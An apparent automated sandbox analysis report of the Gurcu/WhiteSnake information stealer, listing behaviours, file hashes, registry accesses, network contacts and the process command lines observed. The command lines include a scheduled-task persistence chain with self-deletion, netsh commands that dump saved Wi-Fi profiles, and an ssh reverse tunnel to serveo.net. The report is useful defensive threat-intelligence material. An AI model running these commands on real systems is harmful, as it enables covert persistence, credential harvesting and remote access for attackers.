Analysis Overview
SHA256
0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Threat Level: Known bad
The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.
Malicious Activity Summary
Detect Gurcu Stealer V3 payload
Gurcu, WhiteSnake
Gurcu family
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Deletes itself
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
outlook_win_path
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
outlook_office_path
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-14 03:47
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gurcu family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-14 03:47
Reported
2023-10-14 19:53
Platform
win7-20230831-en
Max time kernel
152s
Max time network
153s
Command Line
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu, WhiteSnake
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
C:\Windows\system32\taskeng.exe
taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:7396 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp
memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp
memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp
memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp
memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp
memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
| MD5 | d1ce628a81ab779f1e8f7bf7df1bb32c |
| SHA1 | 011c90c704bb4782001d6e6ce1c647bf2bb17e01 |
| SHA256 | 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71 |
| SHA512 | de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f |
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
| MD5 | d1ce628a81ab779f1e8f7bf7df1bb32c |
| SHA1 | 011c90c704bb4782001d6e6ce1c647bf2bb17e01 |
| SHA256 | 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71 |
| SHA512 | de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f |
\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
| MD5 | 79a6e2268dfdba1d94c27f4b17265ff4 |
| SHA1 | b17eed8cb6f454700f8bfcfd315d5627d3cf741c |
| SHA256 | 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5 |
| SHA512 | 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c |
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
| MD5 | 79a6e2268dfdba1d94c27f4b17265ff4 |
| SHA1 | b17eed8cb6f454700f8bfcfd315d5627d3cf741c |
| SHA256 | 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5 |
| SHA512 | 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c |
Analysis: behavioral2
Detonation Overview
Submitted
2023-10-14 03:47
Reported
2023-10-14 19:54
Platform
win10v2004-20230915-en
Max time kernel
114s
Max time network
127s
Command Line
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu, WhiteSnake
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.248.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| N/A | 127.0.0.1:4742 | N/A | tcp |
Files
memory/2580-0-0x00000215DCD60000-0x00000215DCD84000-memory.dmp
memory/2580-1-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp
memory/2580-2-0x00000215DEC10000-0x00000215DEC20000-memory.dmp
memory/2580-6-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log
| MD5 | 3308a84a40841fab7dfec198b3c31af7 |
| SHA1 | 4e7ab6336c0538be5dd7da529c0265b3b6523083 |
| SHA256 | 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e |
| SHA512 | 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198 |
memory/408-11-0x00007FFF54460000-0x00007FFF54F21000-memory.dmp
memory/408-12-0x00000214C7EE0000-0x00000214C7EF0000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |